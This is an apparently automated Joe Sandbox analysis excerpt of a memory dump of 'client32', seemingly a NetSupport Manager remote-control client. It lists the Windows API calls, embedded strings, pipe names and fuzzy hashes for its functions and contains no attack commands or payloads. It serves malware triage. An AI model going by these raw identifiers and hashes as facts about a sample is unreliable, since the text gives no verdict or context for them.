                                                                                                                                                                                                    • DrawTextA.USER32(?,?,000000FF,?,00008000), ref: 1107B83A
                                                                                                                                                                                                    • OffsetRect.USER32(?,000000FF,000000FF), ref: 1107B848
                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 1107B859
                                                                                                                                                                                                    • DrawTextA.USER32(?,?,000000FF,?,00008000), ref: 1107B8A5
                                                                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 1107B8B3
                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 1107B8BB
                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 1107B8C9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 1107B66E
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1107B669
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: RectText$Offset$ColorDraw$Window$EnabledItemModeObjectSelect$CtrlExtentPoint
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 1037719170-2830328467
                                                                                                                                                                                                    • Opcode ID: f12d14fb7baf8ebf126ec1d2fae925ceb7ee556ae07c4c752fb7b4e824a2f397
                                                                                                                                                                                                    • Instruction ID: 3a1015ba9db7ebe9a225c832c9c2fba055e3f61b29bcdc8589afcc457abe4137
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f12d14fb7baf8ebf126ec1d2fae925ceb7ee556ae07c4c752fb7b4e824a2f397
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48025074A002299FDB15CF64CC84FAEB7B5FF49314F108298EA19A7285DB34AE85CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11087A50: IsWindow.USER32(110055D2), ref: 11087A6C
                                                                                                                                                                                                      • Part of subcall function 11087A50: IsWindow.USER32(?), ref: 11087A86
                                                                                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 11121695
                                                                                                                                                                                                    • RegisterClassA.USER32(00000003), ref: 1112169E
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(111E5C50), ref: 111216F0
                                                                                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 11121716
                                                                                                                                                                                                    • RegisterClassA.USER32(00000020), ref: 11121722
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 1112172F
                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 11121761
                                                                                                                                                                                                    • CreateWindowExA.USER32(?,111B3210,00000000,52000000,?,?,?,?,?,00000000,00000000,?), ref: 111217BC
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(User32.dll,View,TouchWidth,00000020,00000000,?,?), ref: 11121806
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterTouchWindow), ref: 11121887
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 111218A6
                                                                                                                                                                                                    • CreateWindowExA.USER32(?,NSMRemote32,00000000,52300000,?,?,?,?,?,00000000,00000000,?), ref: 111218E1
                                                                                                                                                                                                    • IsWindow.USER32(00000000), ref: 111218EA
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1112190B
                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 11121919
                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 11121922
                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 11121931
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,?), ref: 11121966
                                                                                                                                                                                                    • GetActiveWindow.USER32 ref: 11121981
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,00000001,?,?,?,?,?,?), ref: 111219C8
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$ErrorLast$ClassClientCreateLibraryLongObjectRectRegisterStock$ActiveAddressCurrentExitFreeIncrementInterlockedLoadMessageProcProcessThreadwsprintf
                                                                                                                                                                                                    • String ID: $..\ctl32\Remote.cpp$::IsWindow(hWnd)$FullScreen$NSMRemote32$RegisterTouchWindow$Remote!RegisterTouchWindow() failed for touch border, error %d$ScaleToFit$TouchWidth$User32.dll$View$hWndTouch$ok || GetLastError() == 1410
                                                                                                                                                                                                    • API String ID: 3842685962-3599241244
                                                                                                                                                                                                    • Opcode ID: 426ff793d86bd5872fdfd9fcd4fe2d0e4a8183afb80ff5ac1c1571aff371d28e
                                                                                                                                                                                                    • Instruction ID: 400e9730b5ef3912cdd2794fdd6cb887c5493412ee1f0dc17ea482fa534bc219
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 426ff793d86bd5872fdfd9fcd4fe2d0e4a8183afb80ff5ac1c1571aff371d28e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2F103B5E00619AFDB10DFA9C984B9EFBF5BB48304F60856EE519E7240E730A941CF61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 111390BA
                                                                                                                                                                                                    • GetStockObject.GDI32(00000004), ref: 111390C5
                                                                                                                                                                                                    • RegisterClassA.USER32(?), ref: 111390D9
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1113914F
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1113916B
                                                                                                                                                                                                    • CreateWindowExA.USER32(00080020,NSMBlankWnd,Blank,88800000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 111391D5
                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000053), ref: 1113923E
                                                                                                                                                                                                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000053), ref: 1113926D
                                                                                                                                                                                                    • UpdateWindow.USER32(?), ref: 1113929B
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,DwmEnableComposition), ref: 111392B6
                                                                                                                                                                                                    • SetTimer.USER32(?,00000081,00000014,00000000), ref: 111392FA
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,110F55DC), ref: 11139304
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,110F55DC), ref: 11139322
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$Window$AddressClassCreateCursorExitLoadMessageObjectProcProcessRegisterStockTimerUpdatewsprintf
                                                                                                                                                                                                    • String ID: Blank$BlankHeight$BlankWidth$BlankWnd x%x created, w=%d, h=%d$DwmEnableComposition$Error setting blankwnd timer, e=%d$Error. BlankWnd not created, e=%d$Error. RegisterClass(%s) failed, e=%d$Info. Class %s already registered$NSMBlankWnd$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$Zv
                                                                                                                                                                                                    • API String ID: 1116282658-1464822714
                                                                                                                                                                                                    • Opcode ID: d6d6ab1509d3c4d41658e3a31fc9e6f75bcf691539e9c4f314b72d0600c8e854
                                                                                                                                                                                                    • Instruction ID: 6cb21f8f8127432fbcbf373ae429d8022df700afa094652b34364ba5c840ba31
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6d6ab1509d3c4d41658e3a31fc9e6f75bcf691539e9c4f314b72d0600c8e854
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D81D575B4030AAFD710DFA5CC85FEEF7B8EB88715F20442DF659A6280E77065408B55
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 1107D192
                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 1107D1C1
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1107D1CF
                                                                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 1107D238
                                                                                                                                                                                                    • SetTextColor.GDI32(00000000,?), ref: 1107D24C
                                                                                                                                                                                                    • SetBkColor.GDI32(00000000,00E8E8E8), ref: 1107D25E
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 1107D3DE
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 1107D3EB
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1107D3F9
                                                                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,?,?), ref: 1107D415
                                                                                                                                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 1107D468
                                                                                                                                                                                                    • DrawTextA.USER32(00000000,?,000000FF,?,00040024), ref: 1107D487
                                                                                                                                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 1107D495
                                                                                                                                                                                                    • DrawTextA.USER32(00000000,?,000000FF,?,00040024), ref: 1107D4AE
                                                                                                                                                                                                    • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 1107D4D2
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1107D4E6
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1107D4F5
                                                                                                                                                                                                    • SetTextColor.GDI32(00000000,?), ref: 1107D4FF
                                                                                                                                                                                                    • SetBkColor.GDI32(00000000,?), ref: 1107D50D
                                                                                                                                                                                                    • SetBkMode.GDI32(00000000,?), ref: 1107D51B
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1107D529
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1107D532
                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 1107D535
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ColorObjectText$Select$CreateDelete$CompatibleDrawMode$BitmapErrorExitFontIndirectInfoLastMessageParametersProcessRectSystemwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Coolbar.cpp$hMem
                                                                                                                                                                                                    • API String ID: 1502936758-2516694766
                                                                                                                                                                                                    • Opcode ID: 36d219e26726848059f52c981c0d14bc7668550830b1415c31726c39383ac83b
                                                                                                                                                                                                    • Instruction ID: 78a9f170916dfafc2dc45aeca8387f828832c0ae4b7178e67d184a542258695a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36d219e26726848059f52c981c0d14bc7668550830b1415c31726c39383ac83b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BD11975A00629AFDB15CF64CC84BEEB7B5AF49304F1081D9E659A7240DB30AE81CF95
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1104D870: SetEvent.KERNEL32(?), ref: 1104D927
                                                                                                                                                                                                      • Part of subcall function 1104D870: CloseHandle.KERNEL32(?), ref: 1104D98D
                                                                                                                                                                                                      • Part of subcall function 1104D870: CloseHandle.KERNEL32(?), ref: 1104D99F
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1104F394
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 1104F3BD
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1104F3C8
                                                                                                                                                                                                    • SetNamedPipeHandleState.KERNEL32(00000000,00000002,00000000,00000000), ref: 1104F3F5
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,BBC4A55B), ref: 1104F40B
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,Function_0003C050,00000001,00000000), ref: 1104F4B5
                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 1104F4C3
                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?), ref: 1104F4D7
                                                                                                                                                                                                    • GetPriorityClass.KERNEL32(00000000), ref: 1104F4EC
                                                                                                                                                                                                      • Part of subcall function 110B6BD0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B6BF6
                                                                                                                                                                                                      • Part of subcall function 110B6BD0: GetProcAddress.KERNEL32(00000000), ref: 110B6BFD
                                                                                                                                                                                                      • Part of subcall function 110B6BD0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B6C13
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 1104F4FA
                                                                                                                                                                                                    • GetACP.KERNEL32(View,CacheSize,00000400,00000000), ref: 1104F54E
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 1104F55D
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 1104F56C
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(?,00000026), ref: 1104F58A
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(?,00000068), ref: 1104F59A
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 1104F5C8
                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004C), ref: 1104F5D6
                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000004D), ref: 1104F5E0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Handle$CapsDevice$CloseProcess$CreateEventMetricsSystem$AddressClassCurrentErrorFileLastModuleNamedOpenPipePriorityProcReleaseStateThreadWindowwsprintf
                                                                                                                                                                                                    • String ID: CLTCONN.CPP$CacheSize$Error creating hShowPipe, e=%d$Show enabling mirror$View$\\.\pipe\nsm_ctl32_show_%d$idata->hShowEvent
                                                                                                                                                                                                    • API String ID: 1070019554-2085025582
                                                                                                                                                                                                    • Opcode ID: ab3b9fd2497bccdc1ad2a3eeb3d4d48281e00dd69a0b96e76b26206504cea97d
                                                                                                                                                                                                    • Instruction ID: a762959b66c2b007555d3d1dad52a1717f1328b6c18758764795a7a29e9eccb5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab3b9fd2497bccdc1ad2a3eeb3d4d48281e00dd69a0b96e76b26206504cea97d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBD13F74E007169FDB15CF68C888BEEB7F5BB48304F1085ADE96A97284DB74AA40CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Object$Delete$Select$MessagePostQuitShowWindowwsprintf
                                                                                                                                                                                                    • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                                                                                                                                    • API String ID: 4003178439-770455996
                                                                                                                                                                                                    • Opcode ID: 26177ce62bbb57279373dbf2d334d62ed57bccf9437a2dbeea888348ad9f5431
                                                                                                                                                                                                    • Instruction ID: 0e393dd9f50b4abf726b269e2623b848e1bd90be6afddd879db765a1a84127a1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26177ce62bbb57279373dbf2d334d62ed57bccf9437a2dbeea888348ad9f5431
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A813AB5600605AFE364DBA5C990EABF7F9AF8C304F10450DF6AA97241DA71FC41CB60
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: %spciinv.dll$%sremcmdstub.exe$Client$DEMO$DisableInventory$DisableRemoteCmd$EnableSmartcardAuth$Inactivity$MinimumEncryption$Password$UseNTSecurity$UserAcknowledge$Usernames$_License$_debug$platformid$serial_no
                                                                                                                                                                                                    • API String ID: 0-1779888543
                                                                                                                                                                                                    • Opcode ID: e16a8755776086d36e1b31847ec66cab136d5ab0f4874b86e8c28349ff3edf32
                                                                                                                                                                                                    • Instruction ID: 5762d973d5433722e04aa92932485fba5c9e567f96aab9c52d96a157c048a66c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e16a8755776086d36e1b31847ec66cab136d5ab0f4874b86e8c28349ff3edf32
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AD1D674F053199BEB91CF65CC40FEEB7B5AF45704F0044D9E519AB280EB70A984CB55
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetWindowTextA.USER32(00000000,?,00000040), ref: 11045830
                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,?), ref: 1104586E
                                                                                                                                                                                                    • SetWindowTextA.USER32(00000000,00000000), ref: 110458C3
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(00000000,?,?), ref: 110458E0
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(00000000,0000046D,?), ref: 110458F5
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(00000000,0000047B,00000000), ref: 1104591B
                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,?), ref: 110459A0
                                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00000001), ref: 110459FD
                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 11045A00
                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000001,-0000000A,-0000000A,00000000,00000000,00000041,00000000), ref: 11045A83
                                                                                                                                                                                                    • SetTimer.USER32(00000000,00000001,000003E8,00000000), ref: 11045947
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,000000FF,?,00000000,00000000,00000000,00000041), ref: 11045AC8
                                                                                                                                                                                                    • BringWindowToTop.USER32(?), ref: 11045ADC
                                                                                                                                                                                                      • Part of subcall function 1115B8E0: SetForegroundWindow.USER32(00000000), ref: 1115B90E
                                                                                                                                                                                                    • MessageBeep.USER32(000000FF), ref: 11045AED
                                                                                                                                                                                                      • Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,76596610), ref: 11141740
                                                                                                                                                                                                      • Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000C), ref: 11045B51
                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000B), ref: 11045B56
                                                                                                                                                                                                    • LoadImageA.USER32(00000000,00000483,00000001,00000000), ref: 11045B66
                                                                                                                                                                                                    • DestroyCursor.USER32(00000000), ref: 11045B8D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Item$Text$MessageMetricsSystemwsprintf$BeepBringCursorDestroyErrorExitForegroundImageLastLoadOpenProcessShowTimerVersion
                                                                                                                                                                                                    • String ID: CLTCONN.CPP$Create Message Dialog$Register for log off event$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd$m_idata
                                                                                                                                                                                                    • API String ID: 3778382965-926533556
                                                                                                                                                                                                    • Opcode ID: c68913eaa637acba0dd0a477afb990d6e0eb63502d1e20dde54b094dab0fbbb5
                                                                                                                                                                                                    • Instruction ID: fbb7bb46882f2f9d323433b6bf250fd0ae6c3b835bfed70dc686f61fe2a867e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c68913eaa637acba0dd0a477afb990d6e0eb63502d1e20dde54b094dab0fbbb5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07C1B475B00716AFE711CBA5CCC1FAAF7E9AF44708F108468F6259B680EB75E940CB51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,00000000,?,00000000), ref: 1109D152
                                                                                                                                                                                                    • OpenProcess.KERNEL32(00100000,00000000,?), ref: 1109D175
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1109D180
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109D195
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109D19B
                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 1109D1A1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$Reset$CloseHandleMultipleObjectsOpenProcessWait
                                                                                                                                                                                                    • String ID: ..\CTL32\ipc.cpp$cbdata=%d, datalen-sizeof=%d$deadshare$iffy result$no error$senderror$timeout
                                                                                                                                                                                                    • API String ID: 1194186020-3727536503
                                                                                                                                                                                                    • Opcode ID: 53726f0fd4f3a0fb9772eb67dd7fc1ed00702a47c42144c9a1f6c50b7287015d
                                                                                                                                                                                                    • Instruction ID: 6b473be9785bc0d4b7e502112369cfe56b08eb277d01e6e1a90085580c10e120
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53726f0fd4f3a0fb9772eb67dd7fc1ed00702a47c42144c9a1f6c50b7287015d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49B16FB5A007089BD720CF25D894B5AF7F5BF88314F10CA9DEA4A9B640CB70E981DF60
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 1101549F
                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 110154B7
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 110154E1
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110154F5
                                                                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 11015500
                                                                                                                                                                                                    • BeginPath.GDI32(00000000), ref: 1101550D
                                                                                                                                                                                                    • TextOutA.GDI32(00000000,00000000,00000000), ref: 11015530
                                                                                                                                                                                                    • EndPath.GDI32(00000000), ref: 11015537
                                                                                                                                                                                                    • PathToRegion.GDI32(00000000), ref: 1101553E
                                                                                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 11015550
                                                                                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 11015566
                                                                                                                                                                                                    • CreatePen.GDI32(00000000,00000002,?), ref: 11015580
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 1101558E
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1101559E
                                                                                                                                                                                                    • GetRgnBox.GDI32(00000000,?), ref: 110155AB
                                                                                                                                                                                                    • OffsetRgn.GDI32(00000000,?,00000000), ref: 110155CA
                                                                                                                                                                                                    • FillRgn.GDI32(00000000,00000000,?), ref: 110155D9
                                                                                                                                                                                                    • FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 110155EC
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 110155F9
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11015603
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 1101560D
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 11015616
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1101561F
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 11015628
                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 11015632
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1101563B
                                                                                                                                                                                                    • SetBkMode.GDI32(00000000,?), ref: 11015645
                                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 11015659
                                                                                                                                                                                                    Memory Dump Source
